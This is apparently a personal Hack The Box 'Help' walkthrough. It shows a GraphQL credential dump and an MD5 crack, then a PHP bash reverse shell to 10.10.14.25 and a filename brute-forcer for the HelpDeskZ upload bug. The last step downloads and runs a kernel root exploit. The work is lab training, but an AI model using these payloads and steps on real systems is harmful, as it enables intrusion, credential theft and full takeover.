HTB Help done
Help
OS:
Linux
Notes
HelpDeskZ 1.0.2 - Arbitrary File Upload --> https://www.exploit-db.com/exploits/40300
From: http://help.htb:3000/
Username: Shiv
Technology:
GraphQL
HelpDeskZ 1.0.2
Express framework
IP Address:
10.10.10.121
Open ports:
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18
3000/tcp open http Node.js Express framework
Users and pass:
From http://help.htb:3000/graphql
L: [email protected]
P: godhelpmeplz
---
Nmap
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Help]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.10.10.121_nmap 10.10.10.121 ; cat 10.10.10.121_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-04 22:57 CEST
Nmap scan report for 10.10.10.121
Host is up (0.034s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA)
| 256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA)
|_ 256 e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 (ED25519)
80/tcp open http Apache httpd 2.4.18
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Did not follow redirect to http://help.htb/
3000/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
Add IP to /etc/hosts
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Help]
└─$ cat /etc/hosts | grep help
10.10.10.121 help.htb
Open website: http://help.htb/
Default website - Apache, nothing interesting here
Ffuz - http://help.htb
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Help]
└─$ ffuf -u http://help.htb/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -o help.htb_ffuz -of all -e .php,.html,.txt,.bac,.backup
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://help.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php .html .txt .bac .backup
:: Output file : help.htb_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
index.html [Status: 200, Size: 11321, Words: 3503, Lines: 376, Duration: 33ms]
javascript [Status: 301, Size: 309, Words: 20, Lines: 10, Duration: 34ms]
support [Status: 301, Size: 306, Words: 20, Lines: 10, Duration: 33ms]
:: Progress: [122814/122814] :: Job [1/1] :: 1183 req/sec :: Duration: [0:02:00] :: Errors: 0 ::
Ffuz - http://help.htb:3000
ffuf -u http://help.htb:3000/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -o help.htb_3000_ffuz -of all -e .php,.html,.txt,.bac,.backup
Open website: http://help.htb:3000
First check the response headers: the X-Powered-By: Express header confirms the Node.js/Express banner from nmap
__
Content-Length 81
Content-Type application/json; charset=utf-8
Date Mon, 05 Aug 2024 22:59:05 GMT
ETag W/"51-gr8XZ5dnsfHNaB2KgX/Gxm9yVZU"
X-Powered-By Express
---
After googling I confirmed this is a GraphQL endpoint served by express-graphql (Express plus a JSON endpoint at /graphql):
https://graphql.org/graphql-js/running-an-express-graphql-server/
Get creds via GraphQL
Send a query against /graphql asking for the user object's username and password fields (query syntax per the HackTricks GraphQL page)
[GraphQL - HackTricks](https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/graphql#querying)
Run the request with curl
___
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Help]
└─$ curl -s -G http://help.htb:3000/graphql -H "Content-Type: application/json" --data-urlencode "query={user{username,password}}" | jq
{
"data": {
"user": {
"username": "[email protected]",
"password": "5d3c93182bb20f07b994a7f617e99cff"
}
}
}
The password field is an MD5 hash, not a plaintext password
Cracked hash: godhelpmeplz
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Help]
└─$ hash-identifier
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# [email protected] #
#########################################################################
--------------------------------------------------
HASH: 5d3c93182bb20f07b994a7f617e99cff
Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
---
Crack the MD5 hash
___
5d3c93182bb20f07b994a7f617e99cff --> godhelpmeplz
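Added example (not part of the original notes): the hash-identifier step and the wordlist crack above, written out so the logic is explicit. The wordlist is a constructed stand-in for rockyou.txt; the `identify_unsalted` guess is length-based only, which is exactly why hash-identifier lists MD5 alongside other 128-bit formats and cannot tell an unsalted MD5 from, say, NTLM.

```python
import hashlib
from typing import Iterable, Optional

# Hash recovered from the GraphQL user query on this page.
PAGE_HASH = "5d3c93182bb20f07b994a7f617e99cff"

# Constructed mini wordlist standing in for /usr/share/wordlists/rockyou.txt (assumption).
WORDLIST = ["password", "helpme", "Password1", "godhelpmeplz", "letmein"]


def md5_hex(s: str) -> str:
    """Unsalted MD5 of a UTF-8 string, lowercase hex (what HelpDeskZ stores here)."""
    return hashlib.md5(s.encode("utf-8")).hexdigest()


def identify_unsalted(h: str) -> str:
    """Length-only guess, same information hash-identifier has for a bare hex digest."""
    h = h.strip().lower()
    if not h or any(c not in "0123456789abcdef" for c in h):
        return "not a hex digest"
    return {
        32: "MD5 (or another 128-bit hex digest such as NTLM/MD4)",
        40: "SHA-1",
        64: "SHA-256",
        128: "SHA-512",
    }.get(len(h), "unknown length")


def crack_md5(target: str, words: Iterable[str]) -> Optional[str]:
    """Dictionary attack: hash each candidate and compare to the target digest."""
    target = target.strip().lower()
    for w in words:
        w = w.rstrip("\r\n")
        if md5_hex(w) == target:
            return w
    return None


def crack_file(target: str, path: str) -> Optional[str]:
    """Stream a real wordlist file; latin-1 avoids decode errors on rockyou's odd bytes."""
    with open(path, encoding="latin-1", errors="ignore") as fh:
        return crack_md5(target, fh)


if __name__ == "__main__":
    print(identify_unsalted(PAGE_HASH))
    print(crack_md5(PAGE_HASH, WORDLIST))
```

The practitioner's check: an application that stores unsalted MD5 is one wordlist away from plaintext; a salted, slow hash (bcrypt/argon2) would have turned this step into a dead end.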
Log in to the HelpDeskZ support portal with the cracked creds: http://help.htb/support/
L: [email protected]
P: godhelpmeplz
---
http://help.htb/support/?v=view_tickets
Exploit: HelpDeskZ 1.0.2 - Arbitrary File Upload
[HelpDeskZ 1.0.2 - Arbitrary File Upload](https://www.exploit-db.com/exploits/40300)
Upload a PHP reverse shell as a ticket attachment
Revshell
___
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Help]
└─$ cat revshell.php
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.25/80 0>&1'");
?>
---
http://help.htb/support/?v=submit_ticket&action=displayForm
Upload revshell.php as the attachment on "Submit a Ticket". The UI reports the file type as not allowed, but (as exploit-db 40300 notes) the file is still written to uploads/tickets/ under a hashed name, which the exploit script brute-forces.
Download exploit
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Help]
└─$ wget https://www.exploit-db.com/download/40300
--2024-08-27 20:39:23-- https://www.exploit-db.com/download/40300
Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.13
Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.13|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4384 (4.3K) [application/txt]
Saving to: ‘40300’
40300 100%[==============================================>] 4.28K --.-KB/s in 0s
2024-08-27 20:39:24 (191 MB/s) - ‘40300’ saved [4384/4384]
Start netcat (listener on port 80, matching the port in revshell.php)
___
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Help]
└─$ netcat -lvnp 80
listening on [any] 80 ...
connect to [10.10.14.25] from (UNKNOWN) [10.10.10.121] 43068
bash: cannot set terminal process group (747): Inappropriate ioctl for device
bash: no job control in this shell
help@help:/var/www/html/support/uploads/tickets$ id
id
uid=1000(help) gid=1000(help) groups=1000(help),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare)
---
Run the exploit (brute-forces the hashed filename in uploads/tickets/ and requests it, which fires the reverse shell)
___
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Help]
└─$ python2 40300 http://help.htb/support/uploads/tickets/ revshell.php
Helpdeskz v1.0.2 - Unauthenticated shell upload exploit
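Added example (not the exploit-db script and not part of the original notes): the core of what 40300 does, reimplemented offline. Exploit-db 40300 describes HelpDeskZ storing an attachment as md5(original filename . time()) plus the extension, and walking back a window of seconds from the server clock; the exact concatenation used here follows that description and is an assumption, as is the `fake_server` stand-in that replaces the HTTP probe. The `http_exists` probe is provided for a live run but is not exercised.

```python
import hashlib
import urllib.error
import urllib.request
from email.utils import parsedate_to_datetime
from typing import Callable, List, Optional


def server_epoch_from_date_header(date_header: str) -> int:
    """The server's clock seeds the hash, so read it from the HTTP Date header, not ours."""
    return int(parsedate_to_datetime(date_header).timestamp())


def stored_name(original_name: str, upload_epoch: int, ext: str = "php") -> str:
    # Assumed rename scheme, per exploit-db 40300: md5(originalname . time()) + "." + ext
    digest = hashlib.md5((original_name + str(upload_epoch)).encode()).hexdigest()
    return digest + "." + ext


def candidate_names(original_name: str, now_epoch: int, window: int = 300) -> List[str]:
    """Names the file could have if it was uploaded within the last `window` seconds."""
    return [stored_name(original_name, now_epoch - delta) for delta in range(window)]


def find_upload(original_name: str, now_epoch: int,
                exists: Callable[[str], bool], window: int = 300) -> Optional[str]:
    """Probe each candidate with `exists`; return the first one the server serves."""
    for name in candidate_names(original_name, now_epoch, window):
        if exists(name):
            return name
    return None


def http_exists(base_url: str) -> Callable[[str], bool]:
    """Live probe for a real run: GET base_url + name and accept a 200."""
    def probe(name: str) -> bool:
        try:
            with urllib.request.urlopen(base_url + name, timeout=5) as resp:
                return resp.status == 200
        except urllib.error.URLError:  # HTTPError (404 etc.) is a subclass
            return False
    return probe


def fake_server(true_upload_epoch: int) -> Callable[[str], bool]:
    """Constructed offline stand-in: 'serves' only the name HelpDeskZ would have written."""
    truth = stored_name("revshell.php", true_upload_epoch)
    return lambda name: name == truth


if __name__ == "__main__":
    # Constructed scenario: upload happened 42 s before the Date header we read.
    now = server_epoch_from_date_header("Mon, 05 Aug 2024 22:59:05 GMT")
    print(find_upload("revshell.php", now, fake_server(now - 42)))
```

Two things the window hides: if the target's clock is far from yours you must derive `now` from the server's Date header, and the predictable filename is the real bug here, since a random, unguessable name would have made the "upload accepted but rejected in the UI" behaviour unexploitable.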
Read flag: user.txt
help@help:/var/www/html/support/uploads/tickets$ find / -name "user.txt" 2>/dev/null
/home/help/user.txt
help@help:/var/www/html/support/uploads/tickets$ cd /home/help
cd /home/help
help@help:/home/help$
help@help:/home/help$ ls -a
ls -a
.
..
.bash_history
.bash_logout
.bash_profile
.bashrc
.cache
.forever
.nano
.npm
.profile
help
npm-debug.log
user.txt
help@help:/home/help$
help@help:/home/help$ cat user.txt ; id ; ip a
cat user.txt ; id ; ip a
74b1d7f96b6f55a3e1790168e9268d1a
uid=1000(help) gid=1000(help) groups=1000(help),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare)
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 52:54:00:3f:be:02 brd ff:ff:ff:ff:ff:ff
inet 10.0.2.15/24 brd 10.0.2.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fec0::5054:ff:fe3f:be02/64 scope site mngtmpaddr dynamic
valid_lft 86079sec preferred_lft 14079sec
inet6 fe80::5054:ff:fe3f:be02/64 scope link
valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
link/ether 52:54:00:3f:be:02 brd ff:ff:ff:ff:ff:ff
help@help:/home/help$
Privilege Escalation
Check the kernel version
uname -a
Linux help 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
help@help:/home/help$
Exploit: Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation
[Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation](https://www.exploit-db.com/exploits/44298)
Note: uname reports 4.4.0-116 while the exploit title says "< 4.4.0-116"; it worked here anyway, but compare the exact build against the exploit's target before running a kernel exploit, since a mismatch can crash the host instead of escalating.
Start python webserver
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Help]
└─$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.121 - - [27/Aug/2024 22:13:07] "GET /44298 HTTP/1.1" 200 -
Transfer the exploit to the target (fetched from the Kali web server)
help@help:/home/help$ wget http://10.10.14.25:8000/44298
wget http://10.10.14.25:8000/44298
--2024-08-27 15:13:07-- http://10.10.14.25:8000/44298
Connecting to 10.10.14.25:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6021 (5.9K) [application/octet-stream]
Saving to: '44298'
0K ..... 100% 3.03M=0.002s
2024-08-27 15:13:07 (3.03 MB/s) - '44298' saved [6021/6021]
Compile and run exploit
help@help:/home/help$ mv 44298 44298.c
mv 44298 44298.c
help@help:/home/help$
help@help:/home/help$ gcc 44298.c -o exploit_kernel
gcc 44298.c -o exploit_kernel
help@help:/home/help$
help@help:/home/help$ chmod a+x exploit_kernel
chmod a+x exploit_kernel
help@help:/home/help$
help@help:/home/help$ ./exploit_kernel
./exploit_kernel
id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare),1000(help)
Read flag: root.txt
cd /root/
ls -a
.
..
.bash_history
.bashrc
.cache
.forever
.nano
.npm
.profile
root.txt
snap
type root.txt ; id ; ip a
/bin/bash: line 7: type: root.txt: not found
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare),1000(help)
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 52:54:00:3f:be:02 brd ff:ff:ff:ff:ff:ff
inet 10.0.2.15/24 brd 10.0.2.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fec0::5054:ff:fe3f:be02/64 scope site mngtmpaddr dynamic
valid_lft 85972sec preferred_lft 13972sec
inet6 fe80::5054:ff:fe3f:be02/64 scope link
valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
link/ether 52:54:00:3f:be:02 brd ff:ff:ff:ff:ff:ff
cat root.txt
2655c5def2552225a175dd5c301848f0
References
[GraphQL - HackTricks](https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/graphql#querying)
[HelpDeskZ 1.0.2 - Arbitrary File Upload](https://www.exploit-db.com/exploits/40300)
[Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation](https://www.exploit-db.com/exploits/44298)
Lessons Learned